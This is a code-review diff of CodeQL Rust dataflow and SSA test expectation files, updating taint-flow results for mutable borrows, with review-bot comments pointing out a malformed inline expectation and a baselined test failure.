@@ -160,11 +239,58 @@ nodes | main.rs:210:20:210:29 | source(...) | semmle.label | source(...) | | main.rs:211:14:211:15 | * ... | semmle.label | * ... | | main.rs:211:15:211:15 | p [&ref] | semmle.label | p [&ref] | +| main.rs:218:17:218:22 | [post] &mut n [&ref] | semmle.label | [post] &mut n [&ref] | +| main.rs:218:22:218:22 | [post] n | semmle.label | [post] n | +| main.rs:218:25:218:34 | source(...) | semmle.label | source(...) | +| main.rs:219:14:219:14 | n | semmle.label | n | +| main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | semmle.label | SelfParam [Return] [&ref, MyNumber] | +| main.rs:223:27:223:37 | ...: i64 | semmle.label | ...: i64 | +| main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | semmle.label | [post] self [&ref, MyNumber] | +| main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:224:40:224:45 | number | semmle.label | number | +| main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | semmle.label | ...: ... [Return] [&ref, MyNumber] | +| main.rs:228:37:228:47 | ...: i64 | semmle.label | ...: i64 | +| main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | semmle.label | [post] n [&ref, MyNumber] | +| main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:229:33:229:38 | number | semmle.label | number | +| main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | semmle.label | [post] &mut my_number [&ref, MyNumber] | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:234:36:234:45 | source(...) | semmle.label | source(...) | +| main.rs:235:14:235:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:235:14:235:28 | my_number.get(...) | semmle.label | my_number.get(...) | +| main.rs:237:14:237:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:237:14:237:28 | my_number.get(...) 
| semmle.label | my_number.get(...) | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:243:23:243:32 | source(...) | semmle.label | source(...) | +| main.rs:244:14:244:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:244:24:244:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:246:14:246:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:246:24:246:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | semmle.label | [post] &mut my_number [&ref, MyNumber] | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | semmle.label | [post] my_number [MyNumber] | +| main.rs:252:30:252:39 | source(...) | semmle.label | source(...) | +| main.rs:253:14:253:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:253:24:253:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:255:14:255:33 | to_number(...) | semmle.label | to_number(...) | +| main.rs:255:24:255:32 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | subpaths -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:180:14:180:31 | ... .get(...) | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:186:14:186:28 | my_number.get(...) 
| +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:192:14:192:34 | my_number.to_number(...) | | main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:210:17:210:17 | [post] p [&ref] | +| main.rs:218:25:218:34 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:218:17:218:22 | [post] &mut n [&ref] | +| main.rs:234:36:234:45 | source(...) | main.rs:228:37:228:47 | ...: i64 | main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:235:14:235:28 | my_number.get(...) | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:237:14:237:28 | my_number.get(...) | +| main.rs:243:23:243:32 | source(...) | main.rs:223:27:223:37 | ...: i64 | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | main.rs:243:9:243:17 | [post] my_number [MyNumber] | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:244:14:244:33 | to_number(...) | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:246:14:246:33 | to_number(...) | +| main.rs:252:30:252:39 | source(...) | main.rs:223:27:223:37 | ...: i64 | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... 
} | main.rs:253:14:253:33 | to_number(...) | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:255:14:255:33 | to_number(...) | testFailures +| main.rs:255:14:255:33 | to_number(...) | Unexpected result: hasValueFlow=99 | #select | main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | | main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | 
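Review bot: The `testFailures` section in this hunk now baselines `| main.rs:255:14:255:33 | to_number(...) | Unexpected result: hasValueFlow=99 |`, so the test passes while the reported flow and the inline annotation at that sink disagree. The `#select` rows added further down show this flow coming from `source(...)` at 252:30, the same source that reaches the sink on line 253. If the value is expected to be gone by line 255 (the pointers/main.rs hunk is not visible here, so this is inferred), mark the sink as a known false positive with `// $ SPURIOUS: hasValueFlow=99`; if the flow is real, annotate it `// $ hasValueFlow=99`. Either way `testFailures` stays empty and a later change in this taint step shows up as a test diff rather than being absorbed by the baseline.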
@@ -172,8 +298,19 @@ testFailures | main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | | main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) | | main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | +| main.rs:91:14:91:14 | a | main.rs:90:21:90:30 | source(...) | main.rs:91:14:91:14 | a | $@ | main.rs:90:21:90:30 | source(...) | source(...) | +| main.rs:98:14:98:26 | to_be_cleared | main.rs:95:33:95:42 | source(...) | main.rs:98:14:98:26 | to_be_cleared | $@ | main.rs:95:33:95:42 | source(...) | source(...) | | main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | | main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | | main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | | main.rs:180:14:180:31 | ... .get(...) | main.rs:179:44:179:53 | source(...) | main.rs:180:14:180:31 | ... .get(...) | $@ | main.rs:179:44:179:53 | source(...) | source(...) | +| main.rs:186:14:186:28 | my_number.get(...) | main.rs:184:44:184:53 | source(...) | main.rs:186:14:186:28 | my_number.get(...) | $@ | main.rs:184:44:184:53 | source(...) | source(...) | +| main.rs:192:14:192:34 | my_number.to_number(...) | main.rs:190:45:190:54 | source(...) | main.rs:192:14:192:34 | my_number.to_number(...) | $@ | main.rs:190:45:190:54 | source(...) | source(...) | | main.rs:211:14:211:15 | * ... | main.rs:210:20:210:29 | source(...) | main.rs:211:14:211:15 | * ... 
| $@ | main.rs:210:20:210:29 | source(...) | source(...) | +| main.rs:219:14:219:14 | n | main.rs:218:25:218:34 | source(...) | main.rs:219:14:219:14 | n | $@ | main.rs:218:25:218:34 | source(...) | source(...) | +| main.rs:235:14:235:28 | my_number.get(...) | main.rs:234:36:234:45 | source(...) | main.rs:235:14:235:28 | my_number.get(...) | $@ | main.rs:234:36:234:45 | source(...) | source(...) | +| main.rs:237:14:237:28 | my_number.get(...) | main.rs:234:36:234:45 | source(...) | main.rs:237:14:237:28 | my_number.get(...) | $@ | main.rs:234:36:234:45 | source(...) | source(...) | +| main.rs:244:14:244:33 | to_number(...) | main.rs:243:23:243:32 | source(...) | main.rs:244:14:244:33 | to_number(...) | $@ | main.rs:243:23:243:32 | source(...) | source(...) | +| main.rs:246:14:246:33 | to_number(...) | main.rs:243:23:243:32 | source(...) | main.rs:246:14:246:33 | to_number(...) | $@ | main.rs:243:23:243:32 | source(...) | source(...) | +| main.rs:253:14:253:33 | to_number(...) | main.rs:252:30:252:39 | source(...) | main.rs:253:14:253:33 | to_number(...) | $@ | main.rs:252:30:252:39 | source(...) | source(...) | +| main.rs:255:14:255:33 | to_number(...) | main.rs:252:30:252:39 | source(...) | main.rs:255:14:255:33 | to_number(...) | $@ | main.rs:252:30:252:39 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index 6eb1e8b544d5..b96246ff6c44 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs 
@@ -88,14 +88,14 @@ mod intraprocedural_mutable_borrows { let mut a = 1; sink(a); *(&mut a) = source(87); - sink(a); // $ MISSING: hasValueFlow=87 + sink(a); // $ hasValueFlow=87 } pub fn clear_through_borrow() { let mut to_be_cleared = source(34); let p = &mut to_be_cleared; *p = 0; - sink(to_be_cleared); // variable is cleared + sink(to_be_cleared); // $ SPURIOUS: hasValueFlow=34 } pub fn write_through_borrow_in_match(cond: bool) { @@ -183,13 +183,13 @@ mod interprocedural_immutable_borrows { pub fn through_self_in_method_implicit_borrow() { let my_number = MyNumber::MyNumber(source(85)); // Implicit borrow - sink(my_number.get()); // $ MISSING: hasValueFlow=85 + sink(my_number.get()); // $ hasValueFlow=85 } pub fn through_self_in_method_implicit_deref() { let my_number = &MyNumber::MyNumber(source(58)); // Implicit dereference - sink(my_number.to_number()); // $ MISSING: hasValueFlow=58 + sink(my_number.to_number()); // $ hasValueFlow=58 } } @@ -216,7 +216,7 @@ mod interprocedural_mutable_borrows { let mut n = 0; sink(n); set_int(&mut n, source(55)); - sink(n); // $ MISSING: hasValueFlow=55 + sink(n); // $ hasValueFlow=55 } impl MyNumber { 
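Review bot: In `clear_through_borrow` the new `// $ SPURIOUS: hasValueFlow=34` annotation replaces the comment `// variable is cleared`, so the file no longer says why flow to `sink(to_be_cleared)` is a false positive. A line above the sink would keep that, for example `// the write through p overwrites to_be_cleared, so flow of 34 here is a false positive`. The same applies to the three `// now cleared` comments dropped in the `@@ -232,27` hunk of this file. Taken together, these SPURIOUS results suggest a write through a `&mut` borrow does not yet clear earlier flow, which would presumably surface as false positives in taint-based security queries, so recording the reason next to each expectation helps whoever picks that up.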
@@ -232,27 +232,27 @@ mod interprocedural_mutable_borrows { pub fn mutate_enum_through_function() { let mut my_number = MyNumber::MyNumber(0); set_number(&mut my_number, source(64)); - sink(my_number.get()); // $ MISSING: hasValueFlow=64 + sink(my_number.get()); // $ hasValueFlow=64 set_number(&mut my_number, 0); - sink(my_number.get()); // now cleared + sink(my_number.get()); // $ SPURIOUS: hasValueFlow=64 } pub fn mutate_enum_through_method_implicit_borrow() { let mut my_number = MyNumber::MyNumber(0); // Implicit borrow. my_number.set(source(45)); - sink(to_number(my_number)); // $ MISSING: hasValueFlow=45 + sink(to_number(my_number)); // $ hasValueFlow=45 my_number.set(0); - sink(to_number(my_number)); // now cleared + sink(to_number(my_number)); // $ SPURIOUS: hasValueFlow=45 } pub fn mutate_enum_through_method_explicit_borrow() { let mut my_number = MyNumber::MyNumber(0); // Explicit borrow. (&mut my_number).set(source(99)); - sink(to_number(my_number)); // $ MISSING: hasValueFlow=99 + sink(to_number(my_number)); // $ hasValueFlow=99 (&mut my_number).set(0); - sink(to_number(my_number)); // now cleared + sink(to_number(my_number)); // SPURIOUS: hasValueFlow=99 } } diff --git a/rust/ql/test/library-tests/dataflow/sources/test.rs b/rust/ql/test/library-tests/dataflow/sources/test.rs index 53a5edfd8ad4..e4c6b2736d74 100644 --- a/rust/ql/test/library-tests/dataflow/sources/test.rs +++ b/rust/ql/test/library-tests/dataflow/sources/test.rs @@ -117,7 +117,7 @@ async fn test_hyper_http(case: i64) -> Result<(), Box> { // more realistic uses of results... let request = http::Request::builder().uri(url).body(String::from(""))?; let mut response = sender.send_request(request).await?; // $ Alert[rust/summary/taint-sources] - sink(&response); // $ MISSING: hasTaintFlow=request + sink(&response); // $ hasTaintFlow=request if !response.status().is_success() { return Err("request failed".into()) 
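Review bot: The last changed line in `mutate_enum_through_method_explicit_borrow` reads `// SPURIOUS: hasValueFlow=99` without the `$` marker that every other expectation in this hunk carries, so it is most likely not parsed as an inline expectation. That would explain the `testFailures` row `Unexpected result: hasValueFlow=99` for main.rs:255 that the expected output earlier in this patch now records. The line should read `sink(to_number(my_number)); // $ SPURIOUS: hasValueFlow=99`, and the `testFailures` row should disappear from the expected file once the test is regenerated. As committed, the baseline accepts a failing expectation, which makes later regressions at this sink harder to notice.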
diff --git a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected index ee15de985dcd..b58932b3909f 100644 --- a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected @@ -17,9 +17,8 @@ edges | main.rs:52:9:52:10 | s2 | main.rs:53:10:53:11 | s2 | provenance | | | main.rs:52:14:52:29 | ...::from(...) | main.rs:52:9:52:10 | s2 | provenance | | | main.rs:52:27:52:28 | s1 | main.rs:52:14:52:29 | ...::from(...) | provenance | MaD:1 | -| main.rs:63:9:63:9 | s | main.rs:64:16:64:16 | s | provenance | | +| main.rs:63:9:63:9 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | | main.rs:63:13:63:22 | source(...) | main.rs:63:9:63:9 | s | provenance | | -| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | | main.rs:68:9:68:9 | s | main.rs:70:34:70:61 | MacroExpr | provenance | | | main.rs:68:9:68:9 | s | main.rs:73:34:73:59 | MacroExpr | provenance | | | main.rs:68:13:68:22 | source(...) | main.rs:68:9:68:9 | s | provenance | | @@ -66,7 +65,6 @@ nodes | main.rs:53:10:53:11 | s2 | semmle.label | s2 | | main.rs:63:9:63:9 | s | semmle.label | s | | main.rs:63:13:63:22 | source(...) | semmle.label | source(...) | -| main.rs:64:16:64:16 | s | semmle.label | s | | main.rs:64:16:64:25 | s.as_str(...) | semmle.label | s.as_str(...) | | main.rs:68:9:68:9 | s | semmle.label | s | | main.rs:68:13:68:22 | source(...) | semmle.label | source(...) | diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 57245cc30e7e..619283dc4b5a 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected 
@@ -1,12 +1,3 @@ -nonSsaVariable -| main.rs:371:13:371:13 | a | -| main.rs:379:13:379:13 | i | -| main.rs:402:13:402:13 | x | -| main.rs:409:13:409:13 | z | -| main.rs:422:13:422:13 | x | -| main.rs:456:13:456:13 | z | -| main.rs:531:13:531:13 | a | -| main.rs:568:11:568:11 | a | definition | main.rs:3:14:3:14 | s | main.rs:3:14:3:14 | s | | main.rs:7:14:7:14 | i | main.rs:7:14:7:14 | i | @@ -110,13 +101,24 @@ definition | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | +| main.rs:371:13:371:13 | a | main.rs:371:13:371:13 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | 
@@ -127,7 +129,9 @@ definition | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 | closure2 | | main.rs:451:9:451:9 | y | main.rs:448:13:448:13 | y | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | | main.rs:466:13:466:13 | i | main.rs:466:13:466:13 | i | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | | main.rs:468:9:468:9 | i | main.rs:466:13:466:13 | i | @@ -146,11 +150,16 @@ definition | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | | main.rs:544:5:544:5 | a | main.rs:540:13:540:13 | a | | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | 
@@ -246,7 +255,12 @@ read | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | main.rs:356:13:356:13 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | main.rs:365:12:365:12 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | main.rs:366:19:366:22 | text | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:374:11:374:11 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | main.rs:375:15:375:15 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | main.rs:381:14:381:14 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | main.rs:382:6:382:10 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | main.rs:383:15:383:15 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:388:10:388:10 | x | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:389:10:389:10 | x | 
@@ -256,10 +270,17 @@ read | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:396:10:396:10 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:398:9:398:9 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | main.rs:397:6:397:6 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | main.rs:404:27:404:27 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | main.rs:405:6:405:6 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:411:19:411:19 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | main.rs:413:14:413:14 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:416:7:416:7 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | main.rs:418:15:418:15 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | main.rs:424:14:424:14 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | main.rs:425:6:425:6 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | main.rs:426:15:426:15 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | main.rs:436:15:436:15 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | main.rs:435:5:435:7 | cap | | main.rs:432:15:434:5 | x | main.rs:430:9:430:9 | x | main.rs:433:19:433:19 | x | 
@@ -268,7 +289,9 @@ read | main.rs:442:20:444:5 | x | main.rs:440:13:440:13 | x | main.rs:443:19:443:19 | x | | main.rs:450:13:450:20 | closure2 | main.rs:450:13:450:20 | closure2 | main.rs:453:5:453:12 | closure2 | | main.rs:453:5:453:14 | y | main.rs:448:13:448:13 | y | main.rs:454:15:454:15 | y | +| main.rs:456:13:456:13 | z | main.rs:456:13:456:13 | z | main.rs:462:15:462:15 | z | | main.rs:458:13:458:20 | closure3 | main.rs:458:13:458:20 | closure3 | main.rs:461:5:461:12 | closure3 | +| main.rs:458:24:460:5 | z | main.rs:456:13:456:13 | z | main.rs:459:9:459:9 | z | | main.rs:467:9:467:13 | block | main.rs:467:9:467:13 | block | main.rs:471:5:471:9 | block | | main.rs:471:5:471:15 | i | main.rs:466:13:466:13 | i | main.rs:472:15:472:15 | i | | main.rs:475:8:475:8 | b | main.rs:475:8:475:8 | b | main.rs:479:8:479:8 | b | @@ -291,6 +314,10 @@ read | main.rs:521:17:521:17 | f | main.rs:521:17:521:17 | f | main.rs:526:9:526:9 | f | | main.rs:521:21:524:9 | self | main.rs:520:23:520:26 | self | main.rs:523:13:523:16 | self | | main.rs:521:22:521:22 | n | main.rs:521:22:521:22 | n | main.rs:523:25:523:25 | n | +| main.rs:531:13:531:13 | a | main.rs:531:13:531:13 | a | main.rs:532:15:532:15 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:533:5:533:5 | a | +| main.rs:532:15:532:15 | a | main.rs:531:13:531:13 | a | main.rs:534:15:534:15 | a | +| main.rs:535:5:535:5 | a | main.rs:531:13:531:13 | a | main.rs:536:15:536:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:541:15:541:15 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:542:5:542:5 | a | | main.rs:540:13:540:13 | a | main.rs:540:13:540:13 | a | main.rs:543:15:543:15 | a | 
@@ -299,6 +326,8 @@ read | main.rs:549:9:549:9 | x | main.rs:549:9:549:9 | x | main.rs:551:15:551:15 | x | | main.rs:553:9:553:9 | z | main.rs:553:9:553:9 | z | main.rs:554:20:554:20 | z | | main.rs:562:15:562:18 | self | main.rs:562:15:562:18 | self | main.rs:563:6:563:9 | self | +| main.rs:568:11:568:11 | a | main.rs:568:11:568:11 | a | main.rs:569:3:569:3 | a | +| main.rs:569:3:569:3 | a | main.rs:568:11:568:11 | a | main.rs:571:13:571:13 | a | | main.rs:593:9:593:22 | var_from_macro | main.rs:593:9:593:22 | var_from_macro | main.rs:595:15:595:28 | var_from_macro | | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | main.rs:594:9:594:25 | var_in_macro | | main.rs:596:9:596:20 | var_in_macro | main.rs:596:9:596:20 | var_in_macro | main.rs:601:15:601:26 | var_in_macro | 
@@ -382,13 +411,24 @@ firstRead | main.rs:355:14:355:14 | x | main.rs:355:14:355:14 | x | main.rs:356:13:356:13 | x | | main.rs:362:9:362:9 | v | main.rs:362:9:362:9 | v | main.rs:365:12:365:12 | v | | main.rs:364:9:364:12 | text | main.rs:364:9:364:12 | text | main.rs:366:19:366:22 | text | +| main.rs:371:13:371:13 | a | main.rs:371:13:371:13 | a | main.rs:372:5:372:5 | a | +| main.rs:372:5:372:5 | a | main.rs:371:13:371:13 | a | main.rs:373:15:373:15 | a | +| main.rs:374:6:374:11 | &mut a | main.rs:371:13:371:13 | a | main.rs:375:15:375:15 | a | +| main.rs:379:13:379:13 | i | main.rs:379:13:379:13 | i | main.rs:381:14:381:14 | i | | main.rs:380:9:380:13 | ref_i | main.rs:380:9:380:13 | ref_i | main.rs:382:6:382:10 | ref_i | +| main.rs:381:9:381:14 | &mut i | main.rs:379:13:379:13 | i | main.rs:383:15:383:15 | i | | main.rs:386:17:386:17 | x | main.rs:386:17:386:17 | x | main.rs:387:6:387:6 | x | | main.rs:393:22:393:22 | x | main.rs:393:22:393:22 | x | main.rs:394:6:394:6 | x | | main.rs:393:39:393:39 | y | main.rs:393:39:393:39 | y | main.rs:397:6:397:6 | y | +| main.rs:402:13:402:13 | x | main.rs:402:13:402:13 | x | main.rs:404:27:404:27 | x | | main.rs:403:9:403:9 | y | main.rs:403:9:403:9 | y | main.rs:405:6:405:6 | y | +| main.rs:404:22:404:27 | &mut x | main.rs:402:13:402:13 | x | main.rs:407:15:407:15 | x | +| main.rs:409:13:409:13 | z | main.rs:409:13:409:13 | z | main.rs:413:14:413:14 | z | | main.rs:410:9:410:9 | w | main.rs:410:9:410:9 | w | main.rs:414:9:414:9 | w | +| main.rs:413:9:413:14 | &mut z | main.rs:409:13:409:13 | z | main.rs:418:15:418:15 | z | +| main.rs:422:13:422:13 | x | main.rs:422:13:422:13 | x | main.rs:424:14:424:14 | x | | main.rs:423:9:423:9 | y | main.rs:423:9:423:9 | y | main.rs:425:6:425:6 | y | +| main.rs:424:9:424:14 | &mut x | main.rs:422:13:422:13 | x | main.rs:426:15:426:15 | x | | main.rs:430:9:430:9 | x | main.rs:430:9:430:9 | x | main.rs:436:15:436:15 | x | | main.rs:432:9:432:11 | cap | main.rs:432:9:432:11 | cap | 
